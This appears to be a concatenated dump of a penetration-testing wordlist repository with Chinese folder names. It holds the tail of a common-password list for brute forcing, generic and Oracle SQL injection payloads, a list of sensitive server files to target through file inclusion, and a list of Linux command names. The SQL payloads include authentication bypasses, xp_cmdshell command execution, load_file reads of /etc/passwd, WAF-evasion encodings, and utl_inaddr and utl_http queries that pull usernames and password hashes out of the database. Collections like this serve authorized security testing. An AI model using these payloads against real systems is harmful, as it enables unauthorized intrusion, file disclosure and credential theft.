115 | dolphins
116 | donald
117 | dragon
118 | dreams
119 | driver
120 | eagle1
121 | eagles
122 | edward
123 | einstein
124 | erotic
125 | extreme
126 | falcon
127 | fender
128 | ferrari
129 | firebird
130 | fishing
131 | florida
132 | flower
133 | flyers
134 | football
135 | forever
136 | freddy
137 | freedom
138 | gandalf
139 | gateway
140 | gators
141 | gemini
142 | george
143 | giants
144 | ginger
145 | golden
146 | golfer
147 | gordon
148 | gregory
149 | guitar
150 | gunner
151 | hammer
152 | hannah
153 | hardcore
154 | harley
155 | heather
156 | helpme
157 | hockey
158 | hooters
159 | horney
160 | hotdog
161 | hunter
162 | hunting
163 | iceman
164 | iloveyou
165 | internet
166 | iwantu
167 | jackie
168 | jackson
169 | jaguar
170 | jasmine
171 | jasper
172 | jennifer
173 | jeremy
174 | jessica
175 | johnny
176 | johnson
177 | jordan
178 | joseph
179 | joshua
180 | junior
181 | justin
182 | killer
183 | knight
184 | ladies
185 | lakers
186 | lauren
187 | leather
188 | legend
189 | letmein
190 | little
191 | london
192 | lovers
193 | maddog
194 | madison
195 | maggie
196 | magnum
197 | marine
198 | marlboro
199 | martin
200 | marvin
201 | master
202 | matrix
203 | matthew
204 | maverick
205 | maxwell
206 | melissa
207 | member
208 | mercedes
209 | merlin
210 | michael
211 | michelle
212 | mickey
213 | midnight
214 | miller
215 | mistress
216 | monica
217 | monkey
218 | monkey
219 | monster
220 | morgan
221 | mother
222 | mountain
223 | muffin
224 | murphy
225 | mustang
226 | naked
227 | nascar
228 | nathan
229 | naughty
230 | ncc1701
231 | newyork
232 | nicholas
233 | nicole
234 | nipple
235 | nipples
236 | oliver
237 | orange
238 | packers
239 | panther
240 | panties
241 | parker
242 | password
243 | password
244 | password1
245 | password12
246 | password123
247 | patrick
248 | peaches
249 | peanut
250 | pepper
251 | phantom
252 | phoenix
253 | player
254 | please
255 | pookie
256 | porsche
257 | prince
258 | princess
259 | private
260 | purple
261 | pussies
262 | qazwsx
263 | qwerty
264 | qwertyui
265 | rabbit
266 | rachel
267 | racing
268 | raiders
269 | rainbow
270 | ranger
271 | rangers
272 | rebecca
273 | redskins
274 | redsox
275 | redwings
276 | richard
277 | robert
278 | rocket
279 | rosebud
280 | runner
281 | rush2112
282 | russia
283 | samantha
284 | sammy
285 | samson
286 | sandra
287 | saturn
288 | scooby
289 | scooter
290 | scorpio
291 | scorpion
292 | secret
293 | sexsex
294 | shadow
295 | shannon
296 | shaved
297 | sierra
298 | silver
299 | skippy
300 | slayer
301 | smokey
302 | snoopy
303 | soccer
304 | sophie
305 | spanky
306 | sparky
307 | spider
308 | squirt
309 | srinivas
310 | startrek
311 | starwars
312 | steelers
313 | steven
314 | sticky
315 | stupid
316 | success
317 | summer
318 | sunshine
319 | superman
320 | surfer
321 | swimming
322 | sydney
323 | taylor
324 | tennis
325 | teresa
326 | tester
327 | testing
328 | theman
329 | thomas
330 | thunder
331 | thx1138
332 | tiffany
333 | tigers
334 | tigger
335 | tomcat
336 | topgun
337 | toyota
338 | travis
339 | trouble
340 | trustno1
341 | tucker
342 | turtle
343 | twitter
344 | united
345 | vagina
346 | victor
347 | victoria
348 | viking
349 | voodoo
350 | voyager
351 | walter
352 | warrior
353 | welcome
354 | whatever
355 | william
356 | willie
357 | wilson
358 | winner
359 | winston
360 | winter
361 | wizard
362 | xavier
363 | xxxxxx
364 | xxxxxxxx
365 | yamaha
366 | yankee
367 | yankees
368 | yellow
369 | zxcvbn
370 | zxcvbnm
371 | zzzzzz
372 |
--------------------------------------------------------------------------------
/SQL注入测试/检测/xplatform.fuzz.txt:
--------------------------------------------------------------------------------
1 | # to attempt with ids/waf evasion try like
2 | # /index.aspx?page=select 1&page=2,3 from table where id=1
3 | <>"'%;)(&+
4 | |
5 | !
6 | ?
7 | /
8 | //
9 | //*
10 | '
11 | ' --
12 | (
13 | )
14 | *|
15 | */*
16 | &
17 | 0
18 | 031003000270000
19 | 0 or 1=1
20 | 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
21 | 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A
22 | 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
23 | 1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
24 | 1 or 1=1
25 | 1;SELECT%20*
26 | 1 waitfor delay '0:0:10'--
27 | '%20or%20''='
28 | '%20or%201=1
29 | ')%20or%20('x'='x
30 | '%20or%20'x'='x
31 | %20or%20x=x
32 | %20'sleep%2050'
33 | %20$(sleep%2050)
34 | %21
35 | 23 OR 1=1
36 | %26
37 | %27%20or%201=1
38 | %28
39 | %29
40 | %2A%28%7C%28mail%3D%2A%29%29
41 | %2A%28%7C%28objectclass%3D%2A%29%29
42 | %2A%7C
43 | ||6
44 | '||'6
45 | (||6)
46 | %7C
47 | a'
48 | admin' or '
49 | ' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
50 | ' and 1 in (select var from temp)--
51 | anything' OR 'x'='x
52 | "a"" or 1=1--"
53 | a' or 1=1--
54 | "a"" or 3=3--"
55 | a' or 3=3--
56 | a' or 'a' = 'a
57 | '%20OR
58 | as
59 | asc
60 | a' waitfor delay '0:0:10'--
61 | '; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login >
62 | bfilename
63 | char%4039%41%2b%40SELECT
64 | declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
65 | declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
66 | declare @q nvarchar (4000) select @q =
67 | declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
68 | declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
69 | declare @s varchar(22) select @s =
70 | declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e
71 | delete
72 | desc
73 | distinct
74 | '||(elt(-3+5,bin(15),ord(10),hex(char(45))))
75 | '; exec master..xp_cmdshell
76 | '; exec master..xp_cmdshell 'ping 172.10.1.255'--
77 | exec(@s)
78 | '; exec ('sel' + 'ect us' + 'er')
79 | exec sp
80 | '; execute immediate 'sel' || 'ect us' || 'er'
81 | exec xp
82 | '; exec xp_regread
83 | ' group by userid having 1=1--
84 | handler
85 | having
86 | ' having 1=1--
87 | hi or 1=1 --"
88 | hi' or 1=1 --
89 | "hi"") or (""a""=""a"
90 | hi or a=a
91 | hi' or 'a'='a
92 | hi') or ('a'='a
93 | 'hi' or 'x'='x';
94 | insert
95 | like
96 | limit
97 | *(|(mail=*))
98 | *(|(objectclass=*))
99 | or
100 | ' or ''='
101 | or 0=0 #"
102 | ' or 0=0 --
103 | ' or 0=0 #
104 | " or 0=0 --
105 | or 0=0 --
106 | or 0=0 #
107 | ' or 1 --'
108 | ' or 1/*
109 | ; or '1'='1'
110 | ' or '1'='1
111 | ' or '1'='1'--
112 | ' or 1=1
113 | ' or 1=1 /*
114 | ' or 1=1--
115 | ' or 1=1--
116 | '/**/or/**/1/**/=/**/1
117 | ‘ or 1=1 --
118 | " or 1=1--
119 | or 1=1
120 | or 1=1--
121 | or 1=1 or ""=
122 | ' or 1=1 or ''='
123 | ' or 1 in (select @@version)--
124 | or%201=1
125 | or%201=1 --
126 | ' or 2 > 1
127 | ' or 2 between 1 and 3
128 | ' or 3=3
129 | ‘ or 3=3 --
130 | ' or '7659'='7659
131 | or a=a
132 | or a = a
133 | ' or 'a'='a
134 | ' or a=a--
135 | ') or ('a'='a
136 | " or "a"="a
137 | ) or (a=a
138 | order by
139 | ' or (EXISTS)
140 | or isNULL(1/0) /*
141 | " or isNULL(1/0) /*
142 | ' or 'something' like 'some%'
143 | ' or 'something' = 'some'+'thing'
144 | ' or 'text' = n'text'
145 | ' or 'text' > 't'
146 | ' or uid like '%
147 | ' or uname like '%
148 | ' or 'unusual' = 'unusual'
149 | ' or userid like '%
150 | ' or user like '%
151 | ' or username like '%
152 | ' or username like char(37);
153 | ' or 'whatever' in ('whatever')
154 | ' -- &password=
155 | password:*/=1--
156 | PRINT
157 | PRINT @@variable
158 | procedure
159 | replace
160 | select
161 | ' select * from information_schema.tables--
162 | ' select name from syscolumns where id = (select id from sysobjects where name = tablename')--
163 | ' (select top 1
164 | --sp_password
165 | 'sqlattempt1
166 | (sqlattempt2)
167 | 'sqlvuln
168 | '+sqlvuln
169 | (sqlvuln)
170 | sqlvuln;
171 | t'exec master..xp_cmdshell 'nslookup www.google.com'--
172 | to_timestamp_tz
173 | truncate
174 | tz_offset
175 | ' UNION ALL SELECT
176 | ' union all select @@version--
177 | ' union select
178 | uni/**/on sel/**/ect
179 | ' UNION SELECT
180 | ' union select 1,load_file('/etc/passwd'),1,1,1;
181 | ) union select * from information_schema.tables;
182 | ' union select * from users where login = char(114,111,111,116);
183 | update
184 | '||UTL_HTTP.REQUEST
185 | ,@variable
186 | @variable
187 | @var select @var as var into temp end --
188 | \x27UNION SELECT
189 | x' AND 1=(SELECT COUNT(*) FROM tabname); --
190 | x' AND email IS NULL; --
191 | x' AND members.email IS NULL; --
192 | x' AND userid IS NULL; --
193 | x' or 1=1 or 'x'='y
194 | x' OR full_name LIKE '%Bob%
195 | ý or 1=1 --
196 |
--------------------------------------------------------------------------------
/文件包含测试/敏感文件包含.txt:
--------------------------------------------------------------------------------
1 | /etc/issue
2 | /etc/motd
3 | /etc/passwd
4 | /etc/passwd
5 | /etc/shadow
6 | /etc/group
7 | /etc/security/group
8 | /etc/security/passwd
9 | /etc/security/user
10 | /etc/security/environ
11 | /etc/security/limits
12 | /usr/lib/security/mkuser.default
13 | /apache/logs/error.log
14 | /apache/logs/access.log
15 | /etc/httpd/logs/access.log
16 | /etc/httpd/logs/error_log
17 | /var/www/logs/access_log
18 | /var/www/logs/error.log
19 | /usr/local/apache/logs/access_log
20 | /usr/local/apache/logs/access.log
21 | /usr/local/apache/logs/error_log
22 | /usr/local/apache/logs/error.log
23 | /var/log/apache/access_log
24 | /var/log/apache2/access_log
25 | /var/log/apache/error.log
26 | /var/log/apache2/error.log
27 | /var/log/access_log
28 | /var/log/access.log
29 | /var/www/logs/error_log
30 | /var/www/logs/error.log
31 | /var/log/httpd/access_log
32 | /var/log/httpd/error_log
33 | /var/log/httpd/access_log
34 | /var/log/httpd/error_log
35 | /apache2/logs/error.log
36 | /apache2/logs/access.log
37 | /logs/error.log
38 | /logs/access.log
39 | /logs/error_log
40 | /logs/access_log
41 | /usr/local/apache2/logs/access_log
42 | /usr/local/apache2/logs/access.log
43 | /usr/local/apache2/logs/error_log
44 | /usr/local/apache2/logs/error.log
45 | /opt/lampp/logs/access_log
46 | /opt/lampp/logs/error_log
47 | /opt/xampp/logs/access_log
48 | /opt/xampp/logs/error_log
49 | /opt/lampp/logs/access.log
50 | /opt/lampp/logs/error.log
51 | /opt/xampp/logs/access.log
52 | /opt/xampp/logs/error.log
53 | /Program Files\Apache Group\Apache\logs\access.log
54 | /Program Files\Apache Group\Apache\logs\error.log
55 | /usr/local/apache/conf/httpd.conf
56 | /usr/local/apache2/conf/httpd.conf
57 | /etc/httpd/conf/httpd.conf
58 | /etc/apache/conf/httpd.conf
59 | /usr/local/etc/apache/conf/httpd.conf
60 | /etc/apache2/httpd.conf
61 | /usr/local/apache/conf/httpd.conf
62 | /usr/local/apache2/conf/httpd.conf
63 | /usr/local/apache/httpd.conf
64 | /usr/local/apache2/httpd.conf
65 | /usr/local/httpd/conf/httpd.conf
66 | /usr/local/etc/apache/conf/httpd.conf
67 | /usr/local/etc/apache2/conf/httpd.conf
68 | /usr/local/etc/httpd/conf/httpd.conf
69 | /usr/apache2/conf/httpd.conf
70 | /usr/apache/conf/httpd.conf
71 | /usr/local/apps/apache2/conf/httpd.conf
72 | /usr/local/apps/apache/conf/httpd.conf
73 | /etc/apache/conf/httpd.conf
74 | /etc/apache2/conf/httpd.conf
75 | /etc/httpd/conf/httpd.conf
76 | /etc/http/conf/httpd.conf
77 | /etc/apache2/httpd.conf
78 | /etc/httpd/httpd.conf
79 | /etc/http/httpd.conf
80 | /etc/httpd.conf
81 | /opt/apache/conf/httpd.conf
82 | /opt/apache2/conf/httpd.conf
83 | /var/www/conf/httpd.conf
84 | /private/etc/httpd/httpd.conf
85 | /private/etc/httpd/httpd.conf.default
86 | /Volumes/webBackup/opt/apache2/conf/httpd.conf
87 | /Volumes/webBackup/private/etc/httpd/httpd.conf
88 | /Volumes/webBackup/private/etc/httpd/httpd.conf.default
89 | /Program Files\Apache Group\Apache\conf\httpd.conf
90 | /Program Files\Apache Group\Apache2\conf\httpd.conf
91 | /Program Files\xampp\apache\conf\httpd.conf
92 | /usr/local/php/httpd.conf.php
93 | /usr/local/php4/httpd.conf.php
94 | /usr/local/php5/httpd.conf.php
95 | /usr/local/php/httpd.conf
96 | /usr/local/php4/httpd.conf
97 | /usr/local/php5/httpd.conf
98 | /Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
99 | /Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
100 | /Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
101 | /Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
102 | /Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
103 | /Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
104 | /usr/local/etc/apache/vhosts.conf
105 | /etc/php.ini
106 | /bin/php.ini
107 | /etc/httpd/php.ini
108 | /usr/lib/php.ini
109 | /usr/lib/php/php.ini
110 | /usr/local/etc/php.ini
111 | /usr/local/lib/php.ini
112 | /usr/local/php/lib/php.ini
113 | /usr/local/php4/lib/php.ini
114 | /usr/local/php5/lib/php.ini
115 | /usr/local/apache/conf/php.ini
116 | /etc/php4.4/fcgi/php.ini
117 | /etc/php4/apache/php.ini
118 | /etc/php4/apache2/php.ini
119 | /etc/php5/apache/php.ini
120 | /etc/php5/apache2/php.ini
121 | /etc/php/php.ini
122 | /etc/php/php4/php.ini
123 | /etc/php/apache/php.ini
124 | /etc/php/apache2/php.ini
125 | /web/conf/php.ini
126 | /usr/local/Zend/etc/php.ini
127 | /opt/xampp/etc/php.ini
128 | /var/local/www/conf/php.ini
129 | /etc/php/cgi/php.ini
130 | /etc/php4/cgi/php.ini
131 | /etc/php5/cgi/php.ini
132 | /php5\php.ini
133 | /php4\php.ini
134 | /php\php.ini
135 | /PHP\php.ini
136 | /WINDOWS\php.ini
137 | /WINNT\php.ini
138 | /apache\php\php.ini
139 | /xampp\apache\bin\php.ini
140 | /NetServer\bin\stable\apache\php.ini
141 | /home2\bin\stable\apache\php.ini
142 | /home\bin\stable\apache\php.ini
143 | /Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
144 | /usr/local/cpanel/logs
145 | /usr/local/cpanel/logs/stats_log
146 | /usr/local/cpanel/logs/access_log
147 | /usr/local/cpanel/logs/error_log
148 | /usr/local/cpanel/logs/license_log
149 | /usr/local/cpanel/logs/login_log
150 | /usr/local/cpanel/logs/stats_log
151 | /var/cpanel/cpanel.config
152 | /var/log/mysql/mysql-bin.log
153 | /var/log/mysql.log
154 | /var/log/mysqlderror.log
155 | /var/log/mysql/mysql.log
156 | /var/log/mysql/mysql-slow.log
157 | /var/mysql.log
158 | /var/lib/mysql/my.cnf
159 | /etc/mysql/my.cnf
160 | /etc/my.cnf
161 | /etc/logrotate.d/proftpd
162 | /www/logs/proftpd.system.log
163 | /var/log/proftpd
164 | /etc/proftp.conf
165 | /etc/protpd/proftpd.conf
166 | /etc/vhcs2/proftpd/proftpd.conf
167 | /etc/proftpd/modules.conf
168 | /var/log/vsftpd.log
169 | /etc/vsftpd.chroot_list
170 | /etc/logrotate.d/vsftpd.log
171 | /etc/vsftpd/vsftpd.conf
172 | /etc/vsftpd.conf
173 | /etc/chrootUsers
174 | /var/log/xferlog
175 | /var/adm/log/xferlog
176 | /etc/wu-ftpd/ftpaccess
177 | /etc/wu-ftpd/ftphosts
178 | /etc/wu-ftpd/ftpusers
179 | /usr/sbin/pure-config.pl
180 | /usr/etc/pure-ftpd.conf
181 | /etc/pure-ftpd/pure-ftpd.conf
182 | /usr/local/etc/pure-ftpd.conf
183 | /usr/local/etc/pureftpd.pdb
184 | /usr/local/pureftpd/etc/pureftpd.pdb
185 | /usr/local/pureftpd/sbin/pure-config.pl
186 | /usr/local/pureftpd/etc/pure-ftpd.conf
187 | /etc/pure-ftpd.conf
188 | /etc/pure-ftpd/pure-ftpd.pdb
189 | /etc/pureftpd.pdb
190 | /etc/pureftpd.passwd
191 | /etc/pure-ftpd/pureftpd.pdb
192 | /usr/ports/ftp/pure-ftpd/
193 | /usr/ports/net/pure-ftpd/
194 | /usr/pkgsrc/net/pureftpd/
195 | /usr/ports/contrib/pure-ftpd/
196 | /var/log/pure-ftpd/pure-ftpd.log
197 | /logs/pure-ftpd.log
198 | /var/log/pureftpd.log
199 | /var/log/ftp-proxy/ftp-proxy.log
200 | /var/log/ftp-proxy
201 | /var/log/ftplog
202 | /etc/logrotate.d/ftp
203 | /etc/ftpchroot
204 | /etc/ftphosts
205 | /var/log/exim_mainlog
206 | /var/log/exim/mainlog
207 | /var/log/maillog
208 | /var/log/exim_paniclog
209 | /var/log/exim/paniclog
210 | /var/log/exim/rejectlog
211 | /var/log/exim_rejectlog
--------------------------------------------------------------------------------
/操作系统命令执行/LinuxCommands.fuzz.txt:
--------------------------------------------------------------------------------
1 | accept
2 | access
3 | aclocal
4 | aconnect
5 | acpi
6 | acpi_available
7 | acpid
8 | addr2line
9 | addresses
10 | agetty
11 | alsactl
12 | amidi
13 | amixer
14 | anacron
15 | aplay
16 | aplaymidi
17 | apm
18 | apmd
19 | apropos
20 | apt
21 | ar
22 | arch
23 | arecord
24 | arecordmidi
25 | arp
26 | as
27 | at
28 | atd
29 | atq
30 | atrm
31 | audiosend
32 | aumix
33 | autoconf
34 | autoheader
35 | automake
36 | autoreconf
37 | autoscan
38 | autoupdate
39 | badblocks
40 | banner
41 | basename
42 | bash
43 | batch
44 | bc
45 | biff
46 | bison
47 | bzcmp
48 | bzdiff
49 | bzgrep
50 | bzip2
51 | bzless
52 | bzmore
53 | c++
54 | cal
55 | cardctl
56 | cardmgr
57 | cat
58 | cc
59 | cdda2wav
60 | cdparanoia
61 | cdrdao
62 | cdrecord
63 | cfdisk
64 | c++filt
65 | chage
66 | chattr
67 | chfn
68 | chgrp
69 | chkconfig
70 | chmod
71 | chown
72 | chpasswd
73 | chroot
74 | chrt
75 | chsh
76 | chvt
77 | cksum
78 | clear
79 | cmp
80 | col
81 | colcrt
82 | colrm
83 | column
84 | comm
85 | compress
86 | cp
87 | cpio
88 | cpp
89 | crond
90 | crontab
91 | csplit
92 | ctags
93 | cupsd
94 | cut
95 | cvs
96 | date
97 | dd
98 | deallocvt
99 | debugfs
100 | depmod
101 | devdump
102 | df
103 | diff
104 | diff3
105 | dig
106 | dir
107 | dircolors
108 | dirname
109 | disable
110 | dlpsh
111 | dmesg
112 | dnsdomainname
113 | dnssec-keygen
114 | dnssec-makekeyset
115 | dnssec-signkey
116 | dnssec-signzone
117 | doexec
118 | domainname
119 | dosfsck
120 | du
121 | dump
122 | dumpe2fs
123 | dumpkeys
124 | e2fsck
125 | e2image
126 | e2label
127 | echo
128 | edquota
129 | egrep
130 | eject
131 | elvtune
132 | emacs
133 | enable
134 | env
135 | envsubst
136 | esd
137 | esdcat
138 | esd-config
139 | esdctl
140 | esddsp
141 | esdmon
142 | esdplay
143 | esdrec
144 | esdsample
145 | etags
146 | ex
147 | expand
148 | expr
149 | factor
150 | false
151 | fc-cache
152 | fc-list
153 | fdformat
154 | fdisk
155 | fetchmail
156 | fgconsole
157 | fgrep
158 | file
159 | find
160 | finger
161 | fingerd
162 | flex
163 | fmt
164 | fold
165 | formail
166 | free
167 | fsck
168 | ftp
169 | ftpd
170 | fuser
171 | g++
172 | gawk
173 | gcc
174 | gdb
175 | getent
176 | getkeycodes
177 | gpasswd
178 | gpg
179 | gpgsplit
180 | gpgv
181 | gpm
182 | gprof
183 | grep
184 | groff
185 | groffer
186 | groupadd
187 | groupdel
188 | groupmod
189 | groups
190 | grpck
191 | grpconv
192 | gs
193 | gunzip
194 | gzexe
195 | gzip
196 | halt
197 | hdparm
198 | head
199 | hexdump
200 | host
201 | hostid
202 | hostname
203 | htdigest
204 | hwclock
205 | iconv
206 | id
207 | ifconfig
208 | imapd
209 | inetd
210 | info
211 | init
212 | insmod
213 | install
214 | ipcrm
215 | ipcs
216 | iptables
217 | iptables-restore
218 | iptables-save
219 | isodump
220 | isoinfo
221 | isosize
222 | isovfy
223 | ispell
224 | join
225 | kbd_mode
226 | kbdrate
227 | kernelversion
228 | kill
229 | killall
230 | killall5
231 | klogd
232 | kudzu
233 | last
234 | lastb
235 | lastlog
236 | ld
237 | ldconfig
238 | ldd
239 | less
240 | lesskey
241 | lftp
242 | lftpget
243 | link
244 | ln
245 | loadkeys
246 | locale
247 | locate
248 | lockfile
249 | logger
250 | login
251 | logname
252 | logrotate
253 | look
254 | losetup
255 | lpadmin
256 | lpinfo
257 | lpmove
258 | lpq
259 | lpr
260 | lprm
261 | lpstat
262 | ls
263 | lsattr
264 | lsmod
265 | lspci
266 | lsusb
267 | m4
268 | mail
269 | mailq
270 | mailstats
271 | mailto
272 | make
273 | makedbm
274 | makemap
275 | man
276 | manpath
277 | mattrib
278 | mbadblocks
279 | mcat
280 | mcd
281 | mcopy
282 | md5sum
283 | mdel, mdeltree
284 | mdir
285 | mdu
286 | merge
287 | mesg
288 | metamail
289 | metasend
290 | mformat
291 | mimencode
292 | minfo
293 | mkdir
294 | mkdosfs
295 | mke2fs
296 | mkfifo
297 | mkfs
298 | mkfs.ext3
299 | mkisofs
300 | mklost+found
301 | mkmanifest
302 | mknod
303 | mkraid
304 | mkswap
305 | mktemp
306 | mlabel
307 | mmd
308 | mmount
309 | mmove
310 | modinfo
311 | modprobe
312 | more
313 | mount
314 | mountd
315 | mpartition
316 | mpg123
317 | mpg321
318 | mrd
319 | mren
320 | mshowfat
321 | mt
322 | mtools
323 | mtoolstest
324 | mtype
325 | mv
326 | mzip
327 | named
328 | namei
329 | nameif
330 | netstat
331 | newaliases
332 | newgrp
333 | newusers
334 | nfsd
335 | nfsstat
336 | nice
337 | nm
338 | nohup
339 | nslookup
340 | nsupdate
341 | objcopy
342 | objdump
343 | od
344 | openvt
345 | passwd
346 | paste
347 | patch
348 | pathchk
349 | perl
350 | pidof
351 | ping
352 | pinky
353 | pmap
354 | portmap
355 | poweroff
356 | pppd
357 | pr
358 | praliases
359 | printenv
360 | printf
361 | ps
362 | ptx
363 | pwck
364 | pwconv
365 | pwd
366 | python
367 | quota
368 | quotacheck
369 | quotaoff
370 | quotaon
371 | quotastats
372 | raidstart
373 | ramsize
374 | ranlib
375 | rarpd
376 | rcp
377 | rdate
378 | rdev
379 | rdist
380 | rdistd
381 | readcd
382 | readelf
383 | readlink
384 | reboot
385 | reject
386 | rename
387 | renice
388 | repquota
389 | reset
390 | resize2fs
391 | restore
392 | rev
393 | rexec
394 | rexecd
395 | richtext
396 | rlogin
397 | rlogind
398 | rm
399 | rmail
400 | rmdir
401 | rmmod
402 | rndc
403 | rootflags
404 | route
405 | routed
406 | rpcgen
407 | rpcinfo
408 | rpm
409 | rsh
410 | rshd
411 | rsync
412 | runlevel
413 | rup
414 | ruptime
415 | rusers
416 | rusersd
417 | rwall
418 | rwho
419 | rwhod
420 | sane-find-scanner
421 | scanadf
422 | scanimage
423 | scp
424 | screen
425 | script
426 | sdiff
427 | sed
428 | sendmail
429 | sensors
430 | seq
431 | setfdprm
432 | setkeycodes
433 | setleds
434 | setmetamode
435 | setquota
436 | setsid
437 | setterm
438 | sftp
439 | sh
440 | sha1sum
441 | showkey
442 | showmount
443 | shred
444 | shutdown
445 | size
446 | skill
447 | slabtop
448 | slattach
449 | sleep
450 | slocate
451 | snice
452 | sort
453 | split
454 | ssh
455 | ssh-add
456 | ssh-agent
457 | sshd
458 | ssh-keygen
459 | ssh-keyscan
460 | stat
461 | statd
462 | strace
463 | strfile
464 | strings
465 | strip
466 | stty
467 | su
468 | sudo
469 | sum
470 | swapoff
471 | swapon
472 | sync
473 | sysctl
474 | sysklogd
475 | syslogd
476 | tac
477 | tail
478 | tailf
479 | talk
480 | talkd
481 | tar
482 | taskset
483 | tcpd
484 | tcpdump
485 | tcpslice
486 | tee
487 | telinit
488 | telnet
489 | telnetd
490 | test
491 | tftp
492 | tftpd
493 | time
494 | tload
495 | tmpwatch
496 | top
497 | touch
498 | tr
499 | tracepath
500 | traceroute
501 | troff
502 | true
503 | tset
504 | tsort
505 | tty
506 | tune2fs
507 | tunelp
508 | ul
509 | umount
510 | uname
511 | uncompress
512 | unexpand
513 | unicode_start
514 | unicode_stop
515 | uniq
516 | uptime
517 | useradd
518 | userdel
519 | usermod
520 | users
521 | usleep
522 | uudecode
523 | uuencode
524 | uuidgen
525 | vdir
526 | vi
527 | vidmode
528 | vim
529 | vmstat
530 | volname
531 | w
532 | wall
533 | warnquota
534 | watch
535 | wc
536 | wget
537 | whatis
538 | whereis
539 | which
540 | who
541 | whoami
542 | whois
543 | write
544 | xargs
545 | xinetd
546 | yacc
547 | yes
548 | ypbind
549 | ypcat
550 | ypinit
551 | ypmatch
552 | yppasswd
553 | yppasswdd
554 | yppoll
555 | yppush
556 | ypserv
557 | ypset
558 | yptest
559 | ypwhich
560 | ypxfr
561 | zcat
562 | zcmp
563 | zdiff
564 | zdump
565 | zforce
566 | zgrep
567 | zic
568 | zless
569 | zmore
570 | znew
571 |
572 |
--------------------------------------------------------------------------------
/SQL注入测试/检测/oracle.fuzz.txt:
--------------------------------------------------------------------------------
1 | # contains statements from jbrofuzz
2 | ’ or ‘1’=’1
3 | ' or '1'='1
4 | '||utl_http.request('httP://192.168.1.1/')||'
5 | ' || myappadmin.adduser('admin', 'newpass') || '
6 | ' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i
7 | ' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i
8 | ' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i
9 | ' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i
10 | ' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i
11 | ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i
12 | ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i
13 | ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i
14 | ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i
15 | ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i
16 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) AND 'i'='i
17 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=1)) AND 'i'='i
18 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND 'i'='i
19 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=1)) AND 'i'='i
20 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=1)) AND 'i'='i
21 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND 'i'='i
22 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=2)) AND 'i'='i
23 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=2)) AND 'i'='i
24 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=2)) AND 'i'='i
25 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=2)) AND 'i'='i
26 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=3)) AND 'i'='i
